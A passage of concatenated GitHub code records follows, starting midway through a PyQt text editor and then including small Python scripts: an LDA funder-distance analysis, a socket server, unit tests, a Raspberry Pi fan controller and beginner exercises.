NewFile(self, existing=False):\n if existing:\n choice = self.Exit()\n if choice is 0:\n self.Save()\n elif choice is 1:\n return\n self.filename = None\n self._baseFile = None\n self.setWindowTitle(f\"Untitled {self.titleTemplate}\")\n self.textEdit.clear()\n self.doubleSpinBox.setValue(12)\n self.textEdit.setTextColor(QColor('#000000'))\n self.textEdit.setTextBackgroundColor(QColor(255,255,255,0))\n c = self.textEdit.viewport().palette()\n c.setColor(self.textEdit.viewport().backgroundRole(), QColor(255,255,255))\n self.textEdit.viewport().setPalette(c)\n\n\n def OpenFile(self,file):\n if file is None:\n tmpFile, ok = QFileDialog.getOpenFileName(self, \"Open File\", str(os.path.abspath(os.getcwd())), filter=\"All Files (*.*);;Text (*.txt);;HTML (*.html);;Chukurh (*.chk)\", initialFilter=\"Chukurh (*.chk)\")\n if not ok:\n return\n \n if tmpFile is '':\n QMessageBox.critical(self, 'Error', \"Operacion 'abrir archivo' cancelada por el usuario \")\n return\n \n self.filename = tmpFile\n \n self._baseFile = os.path.basename(self.filename)\n self.setWindowTitle(self._baseFile + self.titleTemplate)\n\n self.textEdit.clear()\n with io.open(self.filename, 'r', encoding='utf8') as f:\n if \".txt\" in self.filename:\n self.textEdit.setPlainText(f.read())\n elif \".html\" or \".chk\" in self.filename:\n self.textEdit.setHtml(f.read())\n else:\n self.textEdit.setPlainText(f.read())\n\n self.setWindowModified(False)\n\n\n def write_file(self, ok):\n with io.open(self.filename, 'w', encoding='utf8') as f:\n if \".chk\" in ok or \".html\" in ok:\n color = f'background-color:{self.textEdit.viewport().palette().color(self.textEdit.viewport().backgroundRole()).name()};'\n html = self.textEdit.toHtml()\n html = html.splitlines()\n temp = html[3]\n body_style = temp[:-2] + color + temp[-2:]\n html_final = ''\n for i in html:\n if i == temp:\n html_final += body_style + '\\n'\n else:\n html_final += i + '\\n'\n f.write(html_final)\n else:\n f.write(self.textEdit.toPlainText())\n\n\n def Save(self):\n if not self.isWindowModified():\n return\n \n if self.filename is None:\n tmpFile, ok = QFileDialog.getSaveFileName(self, \"Save File\", str(os.path.abspath(os.getcwd())), filter=\"All Files (*.*);;Text (*.txt);;HTML (*.html);;Chukurh (*.chk)\", initialFilter=\"Chukurh (*.chk)\")\n if not ok:\n return\n if tmpFile is '':\n QMessageBox.critical(self, 'Error', \"Guardado de archivo cancelado por el usuario\")\n return\n \n self.filename = tmpFile\n self._baseFile = os.path.basename(self.filename)\n \n self.setWindowTitle(self._baseFile + self.titleTemplate)\n\n self.write_file(ok)\n \n self.setWindowModified(False)\n\n\n def Save_as(self):\n tmpFile, ok = QFileDialog.getSaveFileName(self, \"Save File\", str(os.path.abspath(os.getcwd())), filter=\"All Files (*.*);;Text (*.txt);;HTML (*.html);;Chukurh (*.chk)\", initialFilter=\"Chukurh (*.chk)\")\n\n if not ok:\n return\n\n if tmpFile is '':\n QMessageBox.critical(self, 'Error', \"Guardado de archivo cancelado por el usuario\")\n return\n\n self.filename = tmpFile\n self._baseFile = os.path.basename(self.filename)\n \n self.setWindowTitle(self._baseFile + self.titleTemplate)\n\n self.write_file(ok)\n \n self.setWindowModified(False)\n\n\n\n def closeEvent(self, a0):\n # print(\"Puchaste x\")\n check = self.Exit()\n if check is 2 or check is 0:\n print(\"Adios\")\n a0.accept()\n else:\n print(\"Nel\")\n a0.ignore()\n \n def Exit(self): \n if not self.isWindowModified():\n return 0\n # sys.exit()\n else:\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Information)\n\n msg.setText(\"Salir sin guardar\")\n msg.setInformativeText(\"Todos los cambios se perderan\")\n msg.setWindowTitle(\"Advertencia\")\n \n # msg.addButton(QMessageBox.Discard)\n # msg.addButton(QMessageBox.Save )\n # msg.addButton(QMessageBox.Cancel)\n \n msg.setStandardButtons(QMessageBox.Save| QMessageBox.Discard| QMessageBox.Cancel)\n msg.setDefaultButton(QMessageBox.Save)\n # msg.buttonClicked.connect(Check)\n \n buttonY = msg.button(QMessageBox.Save)\n buttonY.setText('Guardar')\n buttonN = msg.button(QMessageBox.Discard)\n buttonN.setText('Descartar')\n buttonO = msg.button(QMessageBox.Cancel)\n buttonO.setText('Cancelar')\n \n if msg.exec():\n if msg.buttonRole(msg.clickedButton())== 2:\n #print(\"Discard\")\n return 2\n elif msg.buttonRole(msg.clickedButton()) == 0:\n # i.text() == \"Save \n #print(\"Save\")\n self.Save()\n # sys.exit()\n return 0\n elif msg.buttonRole(msg.clickedButton()) == 1:\n #i.text() == \"cancel\"\n print(\"cancel\")\n print(False)\n return 1\n\n\n def UpdateLineCol(self):\n line = self.textEdit.textCursor().blockNumber() + 1\n col = self.textEdit.textCursor().columnNumber() + 1\n self.statusbar.showMessage(f\"Ln {line}, Col {col}\")\n\n def updateFont(self):\n Font = self.fontComboBox.currentFont()\n FontFam = Font.family()\n indexOf = self.fontComboBox.findText(FontFam)\n self.fontComboBox.setCurrentIndex(indexOf)\n self.textEdit.setFont(Font)\n self.textEdit.setCurrentFont(Font)\n self.textEdit.setFontPointSize(self.doubleSpinBox.value())\n \n\n \n def change_text_colour(self, value):\n ColorD = QColorDialog(self)\n if value is \"Text\":\n ColorD.colorSelected.connect(self.textEdit.setTextColor)\n elif value is \"Background\":\n ColorD.colorSelected.connect(self.textEdit.setTextBackgroundColor)\n ColorD.open()\n\n \n\n def text_format(self, value): \n # italic\n # bold\n # underline, etc\n # print(f\"Cambiar {value}\")\n if value is \"Italic\":\n if not self.textEdit.fontItalic():\n self.textEdit.setFontItalic(True)\n else:\n self.textEdit.setFontItalic(False)\n elif value is \"Underline\":\n if not self.textEdit.fontUnderline():\n self.textEdit.setFontUnderline(True)\n else:\n self.textEdit.setFontUnderline(False)\n \n\n def search_and_replace(self, word, newWord = None, replace = False):\n self.textEdit.textCursor().beginEditBlock()\n doc = self.textEdit.document()\n cursor = QTextCursor(doc)\n while True:\n cursor = doc.find(word, cursor)\n if cursor.isNull():\n break\n if replace and newWord is not None:\n cursor.insertText(newWord)\n\n self.textEdit.textCursor().endEditBlock()\n\n\n\n def Backgroud_Color(self):\n c = self.textEdit.viewport().palette()\n ColorD = QColorDialog(self)\n # ColorD.colorSelected.connect(c.setColor(self.textEdit.viewport().backgroudRole()))\n # ColorD.exec()\n # print(ColorD.currentColor())\n c.setColor(self.textEdit.viewport().backgroundRole(), ColorD.getColor())\n self.textEdit.viewport().setPalette(c)\n print(self.textEdit.viewport().palette().color(self.textEdit.viewport().backgroundRole()).name())\n # print(c.name())\n\n\n","repo_name":"EMACC99/Procesador_de_texto","sub_path":"functions/connector.py","file_name":"connector.py","file_ext":"py","file_size_in_byte":12772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9862071686","text":"import gensim\nimport pandas as pd\nimport re\nimport numpy as np\nimport random\nfrom scipy.spatial.distance import cosine\n\n# load LDA model, dictionary and corpus\n#dictionary = gensim.corpora.Dictionary.load('../clean-data/fine-scale/all-countries/dictionary.dict')\ncorpus = gensim.corpora.MmCorpus('./clean-data/fine-scale/all-countries/corpus.mm')\nlda = gensim.models.ldamulticore.LdaMulticore.load('./models/fine-scale/all-countries/model_140_topics')\n\n# load metadata\nukri_metadata = pd.read_csv(\"./clean-data/fine-scale/UK/UKRI/UKRI_project_metadata.csv\")\n# as the USA metadata project id column is made of only numbers, python thinks it is suppose to be numeric, so coerce it into a string to avoid problems when concatenating the UKRI data.\nus_metadata = pd.read_csv(\"./clean-data/fine-scale/USA/NSF/NSF_project_metadata.csv\", dtype=\"object\")\n\n# row bind the detasets together; and reset index to match corpus, as datasets have more rows than the corpus. That happened because not all projects were used to fit the LDA (for example projects that did not have titles or abstracts)\ndf_meta = pd.concat([ukri_metadata,us_metadata]).reset_index()\n\n## COMBINE METADATA WITH CORPUS IDS ##\n\n# load ordered project ID \nproject_id_ordered = pd.read_csv(\"./clean-data/fine-scale/all-countries/projectID_corpus.csv\")\n# remove .txt from end\nproject_id_ordered[\"ProjectId\"] = project_id_ordered[\"ProjectId\"].apply(lambda x: re.sub(\".txt\",\"\",x))\n# merge projects ids and metadata by columns in common\ndf_meta_joined = project_id_ordered.merge(df_meta, on=[\"ProjectId\",\"Country\",\"CountryFundingBody\"])\n\n## Load doctopic matrix\ndoc_topic_mat = np.load(\"./results/fine-scale/all-countries/doc_topic_mat.npy\")\n#filter doctop\ndoc_topic_mat[doc_topic_mat < 0.01] = 0.0\n\n# filter out docs with no topics (shouldnt exist with new min probability...)\nno_topic_index = np.sum(doc_topic_mat, axis = (0)) > 0\n\n#remove rows from metadata\ndf_meta_joined = df_meta_joined[no_topic_index].reset_index()\ndoc_topic_mat = doc_topic_mat[:,no_topic_index]\n\n\n#Calculate funding body distances\n## DISTANCE MATRIX ##\n\n# To get distance of research councils we:\n# 1) Calculate distance in topic space of each pair of documents (might need to sample if too large...)\n# 2) Calculate summary of distances within and between research councils\n\n## Distance measure\ndef Hellinger(p, q):\n # distance between p an d\n # p and q are np array probability distributions\n n = len(p)\n sum = 0.0\n for i in range(n):\n sum += (np.sqrt(p[i]) - np.sqrt(q[i]))**2\n result = (1.0 / np.sqrt(2.0)) * np.sqrt(sum)\n return result\n\nfunders = df_meta_joined[\"FundingBody\"].unique()\n\nN = len(funders)\nN_sample = 3000\n\n# create empty array to store distances by using the number of existing documents\nHellinger_distance = np.zeros((N,N,N_sample))\n\n# for loop to allocate distances to the distances array\n# for every document in N\nfor i in range(N):\n # and for each document in the top right triangle\n for j in range(i, N):\n #get samples\n indx_1 = df_meta_joined[df_meta_joined.FundingBody == funders[i]].index\n indx_2 = df_meta_joined[df_meta_joined.FundingBody == funders[j]].index\n \n print(len(indx_1), len(indx_2))\n \n indx_1 = random.sample(sorted(indx_1), N_sample)\n indx_2 = random.sample(sorted(indx_2), N_sample)\n for a, (k,l) in enumerate(zip(indx_1,indx_2)):\n # indx = (doc_topic_mat[:,k] != 0) | (doc_topic_mat[:,l] !=0)\n # calculate Hellinger distance of probability of one document to another for all topics\n dis = Hellinger(doc_topic_mat[:,k], doc_topic_mat[:,l])\n Hellinger_distance[i,j,a] = Hellinger_distance[j,i,a] = dis\n\n#save d_mat\nnp.save(\"./results/fine-scale/all-countries/funder_distances.npy\", Hellinger_distance)\n\n#save funders\nwith open(\"./results/fine-scale/all-countries/funder_index.txt\", \"w\") as fn:\n fn.writelines(\"\\n\".join(funders))\n","repo_name":"FCBT/Funding-Landscape","sub_path":"code/old/07_get_distance_matrix_funders.py","file_name":"07_get_distance_matrix_funders.py","file_ext":"py","file_size_in_byte":3944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2266372342","text":"def pattern(a, c):\n if c == True:\n i = 0\n while i < a:\n print(\" * \" * (i + 1))\n i = i + 1\n elif c == False:\n i = a\n while i > 0:\n print(\" * \" * i)\n i = i - 1\n\n\na = int(input('Enter no. of rows:\\n'))\nb = int(input('0 or 1?\\n'))\nc = bool(b)\npattern(a, c)\n","repo_name":"Yashthon/Asterisk-Pattern-Printing","sub_path":"Asterisk-Pattern-Printing.py","file_name":"Asterisk-Pattern-Printing.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"28591731918","text":"\"\"\"\nEjercicio 1\nEscribe una frase aleatoria de una lista de strings cada 3 segundos.\n\n\"\"\"\nimport random\n\n\n# Funciones\ndef random_index(variable,lista):\n if variable:\n index = random.randint(0, len(text_list) - 1)\n print(\"Tu frase es: \" + text_list[index])\n else:\n print(\"Que lastima. Nos vemos la proxima. Igual me has tenido que leer jeje\")\n return\n\n\ndef ask_yes_or_no(message):\n response = None\n while response != \"s\" and response != \"n\":\n response = input(message + \"[s/n]:\")\n return response == \"s\"\n\n\ndef main():\n print(\"Te mostrare una frase aleatoria de mi lista de frases..\")\n a = True\n while a:\n a = ask_yes_or_no(\"Quieres una frase?\")\n random_index(a, text_list)\n\n\nif __name__ == '__main__':\n text_list = [\"Hola mundo!\", \"En memoria del mas...\", \"Perdedor\", \"Aca hay algo raro\", \"Otra frase mas para esta lista\", \"Ya no se me ocurre mas\", \"O.. si ?\"]\n main()","repo_name":"rbo93/mi_primer_programa","sub_path":"Ejercicios Realizados/Random/archivos_ejercicio_uno.py","file_name":"archivos_ejercicio_uno.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1123138478","text":"\nimport io\nimport pytest\nfrom fastapi import UploadFile\nfrom typing import Tuple\nfrom app import ImageUpload, ImageComparison, EnhancedImage, ImageQualityEnhancer\n\n# Import any additional libraries as needed\n\n# Mocked input and expected output data for tests\nTEST_CASES = [\n {\n \"input\": ImageUpload(\n image=UploadFile(\n filename=\"test_image.jpg\",\n file=io.BytesIO(b\"original_image_data\"),\n ),\n ),\n \"expected_output\": (\n ImageComparison(\n original_image=b\"original_image_data\",\n enhanced_image=b\"enhanced_image_data\",\n edits=[\"edit1\", \"edit2\"],\n ),\n EnhancedImage(enhanced_image=b\"enhanced_image_data\"),\n ),\n },\n # Add more test cases as needed\n]\n\n# Mock the superclass transform method to return the desired output for testing\nasync def mocked_transform(*args, **kwargs):\n return [\n ImageComparison(original_image=b\"original_image_data\", enhanced_image=b\"enhanced_image_data\", edits=[\"edit1\", \"edit2\"]),\n EnhancedImage(enhanced_image=b\"enhanced_image_data\"),\n ]\n\n# Use pytest.mark.parametrize to create multiple test scenarios\n@pytest.mark.parametrize(\"test_case\", TEST_CASES)\nasync def test_transform(test_case: dict):\n # Set mocked input data and expected output data\n input_data: ImageUpload = test_case[\"input\"]\n expected_output: Tuple[ImageComparison, EnhancedImage] = test_case[\"expected_output\"]\n\n # Create an instance of the component and test the transform() method\n image_quality_enhancer = ImageQualityEnhancer()\n image_quality_enhancer.super().transform = mocked_transform # Override the superclass method with the mocked version\n\n output = await image_quality_enhancer.transform(input_data, callbacks=None)\n\n # Assert that the output matches the expected output\n assert output == expected_output\n\n # Add error handling and edge cases if necessary\n","repo_name":"yeagerai/yWorkflows-ImageQualityEnhancer-by-Johnathan-2005-c44c1d60","sub_path":"components/image_quality_enhancer/t_image_quality_enhancer.py","file_name":"t_image_quality_enhancer.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5975895862","text":"import socket\nimport os\n\nfrom _thread import *\nfrom handler_server import *\nfrom route_server import *\n\nServerSocket = socket.socket()\nhost = '127.0.0.1'\nport = 42069\nThreadCount = 0\n\ntry:\n ServerSocket.bind((host, port))\nexcept socket.error as e:\n print(str(e))\n\nprint('Waiting for a Connection..')\nServerSocket.listen(5)\n\n\ndef threaded_client(conn):\n while True:\n option, telnet = getOption(conn)\n if not option:\n break\n route( conn, option, telnet )\n conn.close()\n\nwhile True:\n Client, address = ServerSocket.accept()\n print('Connected to: ' + address[0] + ':' + str(address[1]))\n start_new_thread(threaded_client, (Client, ))\n ThreadCount += 1\n print('Thread Number: ' + str(ThreadCount))\nServerSocket.close()\n\n\n\n\n\n\n\n\n\n\n'''import socket\n\nHOST = '127.0.0.1' # Standard loopback interface address (localhost)\nPORT = 65432 # Port to listen on (non-privileged ports are > 1023)\n\nwhile True:\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:\n sock.bind((HOST, PORT))\n sock.listen()\n conn, addr = sock.accept()\n\n with conn:\n print('Connected by', addr)\n\n while True:\n option, telnet = getOption(conn)\n if not option:\n break\n route( conn, option, telnet )\n\n'''","repo_name":"shankars99/nntp-networks-proj","sub_path":"server/pyScripts/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24518299961","text":"\"\"\"Test cases for the base explorer class.\"\"\"\nimport pytest\n\nfrom predicators import utils\nfrom predicators.envs.cover import CoverEnv\nfrom predicators.explorers import BaseExplorer, create_explorer\nfrom predicators.ground_truth_models import get_gt_nsrts, get_gt_options\nfrom predicators.option_model import _OracleOptionModel\n\n\ndef test_create_explorer():\n \"\"\"Tests for create_explorer.\"\"\"\n utils.reset_config({\"env\": \"cover\"})\n env = CoverEnv()\n nsrts = get_gt_nsrts(env.get_name(), env.predicates,\n get_gt_options(env.get_name()))\n option_model = _OracleOptionModel(env)\n train_tasks = [t.task for t in env.get_train_tasks()]\n # Greedy lookahead explorer.\n state_score_fn = lambda _1, _2: 0.0\n name = \"greedy_lookahead\"\n explorer = create_explorer(name,\n env.predicates,\n get_gt_options(env.get_name()),\n env.types,\n env.action_space,\n train_tasks,\n nsrts=nsrts,\n option_model=option_model,\n state_score_fn=state_score_fn)\n assert isinstance(explorer, BaseExplorer)\n # GLIB explorer.\n atom_score_fn = lambda _: 0.0\n name = \"glib\"\n explorer = create_explorer(name,\n env.predicates,\n get_gt_options(env.get_name()),\n env.types,\n env.action_space,\n train_tasks,\n nsrts=nsrts,\n option_model=option_model,\n babble_predicates=env.predicates,\n atom_score_fn=atom_score_fn)\n assert isinstance(explorer, BaseExplorer)\n # Bilevel planning explorer.\n name = \"exploit_planning\"\n explorer = create_explorer(name,\n env.predicates,\n get_gt_options(env.get_name()),\n env.types,\n env.action_space,\n train_tasks,\n nsrts=nsrts,\n option_model=option_model)\n assert isinstance(explorer, BaseExplorer)\n # Basic explorers.\n for name in [\n \"random_actions\",\n \"random_options\",\n ]:\n explorer = create_explorer(name, env.predicates,\n get_gt_options(env.get_name()), env.types,\n env.action_space, train_tasks)\n assert isinstance(explorer, BaseExplorer)\n # Failure case.\n with pytest.raises(NotImplementedError):\n create_explorer(\"Not a real explorer\", env.predicates,\n get_gt_options(env.get_name()), env.types,\n env.action_space, train_tasks)\n","repo_name":"Learning-and-Intelligent-Systems/predicators","sub_path":"tests/explorers/test_base_explorer.py","file_name":"test_base_explorer.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"66"} +{"seq_id":"4949219631","text":"import torch\nimport torchvision\nimport torchvision.transforms as transforms\n\ntorch.manual_seed(0)\n\n# dataset code taken from https://colab.research.google.com/github/pytorch/tutorials/blob/gh-pages/_downloads/4e865243430a47a00d551ca0579a6f6c/cifar10_tutorial.ipynb\ntransform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\ndef get_train_test_loaders(train_batch_size=256, test_batch_size=512):\n trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform)\n testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=train_batch_size, shuffle=True, num_workers=1)\n testloader = torch.utils.data.DataLoader(testset, batch_size=test_batch_size, shuffle=False, num_workers=1)\n\n return trainloader, testloader\n","repo_name":"gurnoor6/oml-lion","sub_path":"image_classification/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"7696570571","text":"# 双指针,快慢\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n def FindKthToTail(self, head, k):\n if head == None or k == 0:\n return None\n kth, end, cnt = None, head, 1\n while end != None:\n if cnt == k:\n kth = head\n elif cnt > k:\n kth = kth.next\n end = end.next\n cnt += 1\n return kth\n","repo_name":"AutuanLiu/Code-Storm2019","sub_path":"Offer/Python/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"11973436470","text":"class Hexagon:\n\n def __init__(self, l, u='6'):\n self.ugal = u\n self.len = l\n\n def calculate_perimeter(self):\n r = (self.len * (3 ** 2)) / 2\n self.radius = r\n s = ((3 * (3 ** 2)) / 2) * (self.len ** 2)\n self.square = s\n p = self.ugal * self.len\n self.perimeter = p\n print(\"Perimeter: \" + str(self.perimeter) + \"; Radius: \" + \n str(self.radius) + \"; Square: \" + str(self.square))\n\nhexagon = Hexagon(2)\nprint(hexagon.calculate_perimeter())\n","repo_name":"pavel-malin/practice_python_and_bash","sub_path":"chall_4.py","file_name":"chall_4.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"8960015007","text":"import adafruit_dht,time,board # importeer de nodige modules\nimport gpiozero as GPIO # importeer deze module en benoem als variabele\nfrom gpiozero import LED # van de gpiozero-module importeer je de LED-module\n\n\ndhtDevice = adafruit_dht.DHT11(board.D12) # de pin D12 is voor de dht11 sensor en stel je gelijk aan de variabele\nled1 = LED(14) # variabele led1 als gpio-pin 14\nled2 = LED(15) # variabele led2 als gpio-pin 15\nled3 = LED(18) # variabele led3 als gpio-pin 18\nled4 = LED(23) # variabele led4 als gpio-pin 23\nled5 = LED(24) # variabele led5 als gpio-pin 24\n\nGPIO.setup(21,GPIO.OUT) # zet GPIO21 als een uitgang\nventilator = GPIO.PWM(21, 100) #deze variable wordt toegekend aan GPIO21 en dat die op een frequentie van 100Hz werkt\nventilator.start(100) # de motor werkt met een frequentie van 100Hz\nteller = 0 # variabele is gelijk aan nul\n\nwhile True: # wanneer waar\n try: # probeer\n time(5) #wacht 5 seconden\n teller+=1 # doe teller + 1\n temperature_c = dhtDevice.temperature # haal de temp op en stop in variabele\n humidity = dhtDevice.humidity # haal de vochtigheid op en stop in variabele\n if humidity >= 20: # als de vochtigheid groter dan of gelijk is dan 20%\n ventilator.ChangeDutyCycle(20) # laat de ventilator op 20% draaien\n print(\"De snelheid vqn de ventilator is op 20%\\n\") # print deze tekst\n elif humidity > 40: # als de vochtigheid groter dan 40% is\n ventilator.ChangeDutyCycle(25) # laat de ventilator op 25% draaien\n print(\"De snelheid vqn de ventilator is op 25%\\n\") # print deze tekst \n elif humidity > 60: # als de vochtigheid groter dan 60% is\n ventilator.ChangeDutyCycle(50) # laat de ventilator op 50% draaien\n print(\"De snelheid vqn de ventilator is op 50%\\n\") # print deze tekst\n elif humidity > 80: # als de vochtigheid groter dan 80% is\n ventilator.ChangeDutyCycle(75) # laat de ventilator op 75% draaien\n print(\"De snelheid vqn de ventilator is op 75%\\n\") # print deze tekst\n else: # anders doe dit\n ventilator.ChangeDutyCycle(0) # laat de ventilator op 0% draaien \n print(\"De snelheid vqn de ventilator is op 0%\\n\") # print deze tekst\n\n if temperature_c >= 15: # als de temp groter dan of gelijk dan 15 graden\n led1.on() # led1 is aan\n led2.off() # led2 is uit\n led3.off() # led3 is uit\n led4.off() # led4 is uit\n led5.off() # led5 is uit\n print(\"led1 is aan\") # print welke led(s) gestuurd word(en)\n elif temperature_c > 18: # als de temp groter dan 18 graden is\n led1.on() # led1 is aan \n led2.on() # led2 is aan\n led3.off() # led3 is uit\n led4.off() # led4 is uit \n led5.off() # led5 is uit\n print(\"led1 led2\\n\") # print welke led(s) gestuurd word(en)\n elif temperature_c > 21: # als de temp groter dan 21 graden is\n led1.on() # led1 is aan\n led2.on() # led2 is aan\n led3.on() # led3 is aan\n led4.off() # led4 is uit\n led5.off() # led5 is uit\n print(\"led1 led2\\n led3\\n\") # print welke led(s) gestuurd word(en) \n elif temperature_c > 24: # als de temp groter dan 24 graden is\n led1.on() # led1 is aan\n led2.on() # led2 is aan\n led3.on() # led3 is aan\n led4.on() # led4 is aan\n led5.off() # led5 is uit\n print(\"led1 led2\\n led3\\n led4\\n\") # print welke led(s) gestuurd word(en)\n elif temperature_c > 27: # als de temp groter dan 27 graden is\n led1.on() # led1 is aan\n led2.on() # led2 is aan\n led3.on() # led3 is aan\n led4.on() # led4 is aan\n led5.on() # led5 is aan\n print(\"led1 led2\\n led3\\n led4\\n led5\\n\") # print welke led(s) gestuurd word(en)\n else: # anders doe dit\n led1.off() # led1 is uit\n led2.off() # led2 is uit\n led3.off() # led3 is uit\n led4.off() # led4 is uit\n led5.off() # led5 is uit\n print(\"alles uit\") # print dat alle ledjes uit zijn\n if teller == 12: # als de teller gelijk is aan 12\n humidity_gemid = humidity/12 # doe de vochtigheid delen door het aantal keren dat er gemeten is, en dat is dus 12 keren en stop in variabele\n temperature_c_gemid = temperature_c_gemid/12 # doe de temp delen door het aantal keren dat er gemeten is, en dat is dus 12 keren en stop in variabele\n print(\"Temperatuur gemiddelde: {:.1f} C Humidity gemiddelde: {}% \".format( #print de gemiddelde temp en vochtigheid met de benodigde symbolen en percentage\n temperature_c_gemid, humidity_gemid)) # deze variabele worden gebruikt bij het uitprinten\n teller = 0 # teller is gelijk aan 0 \n except RuntimeError as error: # behalve als er een fout tijdens het doorlopen van je code optreedt, en benoem dit als de variabele\n print(error.args[0]) # print dit\n time.sleep(2) # wacht 2 seconden\n continue # ga door\n except KeyboardInterrupt: # behalve als er een onderbreking komt van het toetsenbord (control + c)\n print(\"programma is onderbroken\") # print deze tekst\n except Exception as error: # behalve als er een onbekende fout isn en benoem dit als variabele\n dhtDevice.exit() # ga uit de sensor (dht11)\n raise error # stuur een foutmelding\n","repo_name":"ZyaadW/python_oef","sub_path":"examen6iict_vorigJaar.py","file_name":"examen6iict_vorigJaar.py","file_ext":"py","file_size_in_byte":5520,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32896113972","text":"#class - class is simply represented as type of an object and its is also called blueprint.\r\n#object - object is termed as instance of a class and it has own state.\r\nclass Computer(object):\r\n\t\"\"\"docstring for Computer\"\"\"\r\n\tdef config(self):\r\n\t\tprint(\"i5, 16GB, 1TB\")\r\n\r\ncom1 = Computer()\r\ncom1.config()\r\n\t\r\n","repo_name":"sunilvarma9697/Code-Basics","sub_path":"Classand Objects.py","file_name":"Classand Objects.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11264016146","text":"def minOperations(boxes):\n\n ans = []\n for x in range(len(boxes)):\n #Left side\n left_counter = 0\n for l in range(len(boxes)):\n if l < x:\n if boxes[l] == '1':\n left_counter += (x - l)\n #Right side\n right_count = 0\n for r in range(len(boxes)):\n if r > x:\n if boxes[r] == '1':\n right_count += (r - x)\n ans.append((left_counter+right_count))\n return ans\n\n\nboxes = \"110\"\nprint(minOperations(boxes))\n\n\n\n\"\"\"\nexpected ans: [1, 1, 3]\n1 move to move all balls to box 1. 1 move to move all balls to box 2\n3 moves to move all balls to box 3\n\"\"\"\n","repo_name":"AbhiByte/PracticeProblems","sub_path":"LeetCode Problems/Python/1769 Minimum Number of Operations to Move All Balls to Each Box.py","file_name":"1769 Minimum Number of Operations to Move All Balls to Each Box.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19855074607","text":"import numpy as np\nimport cv2\nimport os\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.utils.np_utils import to_categorical\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\nfrom keras.layers import Dropout,Flatten\nfrom keras.layers.convolutional import Conv2D,MaxPooling2D\n\npath = \"TextDetectionUsingNeuralNetworks\\myData\"\ntestRatio = 0.2\nvalRatio =0.2\n\nimages = []\nclassNo = []\nmyList = os.listdir(path)\nprint(\"Total no of Classes detected\", len(myList))\nnoOfClasses = len(myList)\nimageDimensions = (32, 32, 3)\nprint(\"Importing Classes.....\")\nfor x in range(0, noOfClasses):\n myPicList = os.listdir(path+\"/\"+str(x))#read each num folder\n for y in myPicList:\n curImg = cv2.imread(path+\"/\"+str(x)+\"/\"+y)#each image of respective folder\n curImg = cv2.resize(curImg, (imageDimentions[0], imageDimentions[1]))#resize 180/180 to 32/32 because it is computationally expensive\n images.append(curImg)#all images stored\n classNo.append(x)#all class no are stored\n print(x,end= \" \")\nprint(\" \")\n\n#create array\nimages = np.array(images)\nclassNo = np.array(classNo)\n\nprint(images.shape)#value, shape,shape , no of colors(RGB) =3\nprint(classNo.shape)\n\n#Splittng Data\nX_train, X_test, y_train, y_test = train_test_split(images, classNo, test_size=testRatio)\n#Validation\nX_train, X_validation, y_train, y_validation = train_test_split(X_train, y_train, test_size=valRatio)\n\nprint(X_train.shape, y_train.shape)\n\n# class in y_train\nnumOfSamples = []\nfor x in range(0, noOfClasses):\n numOfSamples.append(len(np.where(y_train==x)[0]))#no of images(which are in numerical 0to9) present in each class in y_train\nprint(numOfSamples)\n\nplt.figure(figsize=(10,5))\nplt.bar(range(0, noOfClasses), numOfSamples)\nplt.title(\"No of images for each Class\")\nplt.xlabel(\"Class ID\")\nplt.ylabel(\"Number of Images\")\nplt.show()\n\nprint(X_train[9].shape)\ndef preProcessing(img):\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)#3 to 1\n img = cv2.equalizeHist(img)#equal light to the image\n img = img/255 # Normalization (restricting the 0-255 to 0-1)\n return img \n\n#preprocess all the images in X_train using map func and convert to array\n\nX_train = np.array(list(map(preProcessing, X_train)))\nX_train = np.array(list(map(preProcessing, X_test)))\nX_validation = np.array(list(map(preProcessing, X_validation)))\n\"\"\"img = X_train[9]\nimg = cv2.resize(img, (300,300))\ncv2.imshow(\"preprocessed\", img)\ncv2.waitKey(0)\nprint(img.shape)\"\"\"\n\n\n#we need to add depth 1 for running cnn properly add 4th parameter as depth\nX_train = X_train.reshape(X_train.shape[0], X_train.shape[1], X_train.shape[2], 1)\nX_test = 